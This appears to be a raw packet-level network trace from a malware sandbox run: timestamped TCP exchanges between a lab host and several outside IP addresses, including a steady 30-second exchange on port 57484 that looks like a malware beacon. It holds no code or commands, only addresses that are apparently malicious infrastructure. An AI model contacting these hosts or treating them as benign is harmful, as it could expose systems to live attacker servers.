                                                            Aug 28, 2024 14:02:34.240417004 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240428925 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240432978 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240449905 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240475893 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240487099 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240500927 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240510941 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240523100 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240524054 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240536928 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240540028 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240559101 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240582943 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240762949 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240793943 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240942955 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240956068 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240967035 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240979910 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240983963 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.240993023 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.240998983 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.241007090 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.241027117 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.241041899 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.241086960 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.241099119 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.241111040 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.241121054 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.241122007 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.241132975 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.241136074 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.241147995 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.241151094 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.241167068 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.241189957 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.242590904 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.242620945 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.242660046 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.249741077 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:54.224277973 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:02:54.232137918 CEST4973857484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:02:54.236922026 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:03:08.479604006 CEST4974580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:08.487529039 CEST80497453.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:08.489622116 CEST4974580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:08.492166042 CEST4974580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:08.496889114 CEST80497453.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:08.969852924 CEST80497453.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:08.969886065 CEST80497453.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:08.970057964 CEST4974580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:08.973001957 CEST4974580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:08.977904081 CEST80497453.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:24.255563021 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:03:24.261626005 CEST4973857484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:03:24.266561985 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:03:24.369613886 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:24.374643087 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:24.379448891 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:24.379448891 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:24.387510061 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.070198059 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.070369959 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.070375919 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.070543051 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:25.071247101 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.071254015 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.071345091 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:25.072491884 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.072498083 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.072594881 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:25.073668957 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.073676109 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.073765993 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:25.075182915 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.075387001 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:25.078080893 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.078140974 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.078299999 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:25.166068077 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.166102886 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.166341066 CEST8049746162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:25.166342974 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:25.366066933 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:25.881781101 CEST4974680192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:26.900193930 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:26.909128904 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:26.909677029 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:26.911576986 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:26.918433905 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.598881006 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.599123001 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.599134922 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.599190950 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:27.599647999 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.599659920 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.599701881 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:27.600516081 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.600528955 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.600558043 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:27.601433992 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.601447105 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.601460934 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.601488113 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:27.601509094 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:27.606451988 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.606666088 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.606677055 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.606718063 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:27.690645933 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.690918922 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:27.691040993 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.691049099 CEST8049747162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:27.691092968 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:28.413038015 CEST4974780192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:29.433634996 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:29.441288948 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:29.445741892 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:29.447824955 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:29.455235004 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:29.455240011 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:29.455244064 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:29.455569029 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:29.455573082 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:29.455576897 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:29.455579996 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:29.455583096 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:29.456027985 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.124651909 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.124731064 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.124738932 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.124861956 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:30.125181913 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.125189066 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.125195026 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.125287056 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:30.125873089 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.125880003 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.125885963 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.125936031 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:30.126523972 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.129676104 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:30.130285025 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.130563974 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.130613089 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:30.222692966 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.222822905 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.222827911 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.222877026 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:30.222956896 CEST8049748162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:30.223005056 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:30.959964991 CEST4974880192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:31.978390932 CEST4974980192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:31.987956047 CEST8049749162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:31.988046885 CEST4974980192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:31.990175009 CEST4974980192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:31.998043060 CEST8049749162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:32.616626024 CEST8049749162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:32.741111040 CEST4974980192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:37.601855040 CEST8049749162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:37.601989985 CEST4974980192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:37.602775097 CEST4974980192.168.2.4162.241.2.92
                                                            Aug 28, 2024 14:03:37.608053923 CEST8049749162.241.2.92192.168.2.4
                                                            Aug 28, 2024 14:03:38.601334095 CEST4974180192.168.2.4178.237.33.50
                                                            Aug 28, 2024 14:03:38.920344114 CEST4974180192.168.2.4178.237.33.50
                                                            Aug 28, 2024 14:03:39.594603062 CEST4974180192.168.2.4178.237.33.50
                                                            Aug 28, 2024 14:03:40.928642988 CEST4974180192.168.2.4178.237.33.50
                                                            Aug 28, 2024 14:03:42.634854078 CEST4975080192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:42.639698982 CEST80497505.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:42.641721010 CEST4975080192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:42.643485069 CEST4975080192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:42.648361921 CEST80497505.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:43.242506981 CEST80497505.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:43.242636919 CEST80497505.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:43.242698908 CEST4975080192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:43.428642988 CEST4974180192.168.2.4178.237.33.50
                                                            Aug 28, 2024 14:03:44.147608995 CEST4975080192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:45.166070938 CEST4975180192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:45.170934916 CEST80497515.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:45.171006918 CEST4975180192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:45.172820091 CEST4975180192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:45.177674055 CEST80497515.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:45.776526928 CEST80497515.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:45.776571989 CEST80497515.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:45.776632071 CEST4975180192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:46.678885937 CEST4975180192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:47.697388887 CEST4975280192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:47.703129053 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:47.703272104 CEST4975280192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:47.705670118 CEST4975280192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:47.710510015 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:47.710515976 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:47.710529089 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:47.710562944 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:47.710592985 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:47.710597038 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:47.710602045 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:47.710733891 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:47.710791111 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:48.241142035 CEST4974180192.168.2.4178.237.33.50
                                                            Aug 28, 2024 14:03:48.309449911 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:48.309638023 CEST80497525.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:48.309830904 CEST4975280192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:49.210179090 CEST4975280192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:50.229135990 CEST4975380192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:50.234019995 CEST80497535.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:50.237737894 CEST4975380192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:50.239435911 CEST4975380192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:50.244327068 CEST80497535.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:50.835014105 CEST80497535.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:50.835089922 CEST80497535.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:50.835145950 CEST4975380192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:50.837798119 CEST4975380192.168.2.45.78.41.174
                                                            Aug 28, 2024 14:03:50.842742920 CEST80497535.78.41.174192.168.2.4
                                                            Aug 28, 2024 14:03:54.291601896 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:03:54.295002937 CEST4973857484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:03:54.301990032 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:03:56.035049915 CEST4975480192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:56.039886951 CEST80497543.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:56.039947033 CEST4975480192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:56.042025089 CEST4975480192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:56.047794104 CEST80497543.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:57.553844929 CEST4975480192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:57.832156897 CEST80497543.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:57.832288027 CEST4975480192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:57.832433939 CEST80497543.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:57.832479000 CEST4975480192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:57.834698915 CEST80497543.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:58.038115025 CEST4974180192.168.2.4178.237.33.50
                                                            Aug 28, 2024 14:03:58.574023008 CEST4975580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:58.578876972 CEST80497553.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:58.578952074 CEST4975580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:58.581315041 CEST4975580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:03:58.586225033 CEST80497553.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:59.981828928 CEST80497553.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:03:59.981894016 CEST4975580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:00.084983110 CEST4975580192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:00.089920044 CEST80497553.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.112804890 CEST4975680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:01.127052069 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.127151966 CEST4975680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:01.131511927 CEST4975680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:01.136560917 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.136590004 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.136603117 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.136617899 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.136634111 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.136642933 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.136666059 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.136674881 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.136684895 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.583873987 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:01.584086895 CEST4975680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:02.647524118 CEST4975680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:02.652568102 CEST80497563.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:03.704509974 CEST4975780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:03.709465027 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:03.709825993 CEST4975780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:03.721163034 CEST4975780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:03.725965023 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:05.108885050 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:05.108900070 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:05.109114885 CEST4975780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:05.111520052 CEST4975780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:05.116347075 CEST80497573.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:10.184467077 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.189445019 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.189594030 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.191402912 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.196212053 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871634007 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871649981 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871654987 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871737003 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871751070 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871771097 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.871773005 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871784925 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.871809006 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.871829987 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.872050047 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.872061014 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.872071981 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.872087955 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.872113943 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.876611948 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.876770973 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.876811981 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.963783026 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.963809013 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.963819027 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.963890076 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.963928938 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.963980913 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:10.968518019 CEST8049758188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:10.968600988 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:11.694607973 CEST4975880192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:12.713901043 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:12.719063044 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:12.719131947 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:12.721880913 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:12.727264881 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389419079 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389434099 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389441013 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389765978 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.389906883 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389913082 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389919043 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389930964 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.389938116 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.390037060 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.390197992 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.390202999 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.390252113 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.393768072 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.397073030 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.397084951 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.397738934 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.477937937 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.477946043 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.477953911 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.478099108 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:13.480019093 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.480025053 CEST8049759188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:13.480082989 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:14.225712061 CEST4975980192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.244404078 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.249589920 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.249681950 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.251789093 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.256912947 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.256958008 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257066965 CEST8049760188.114.96.3192.168.2.4
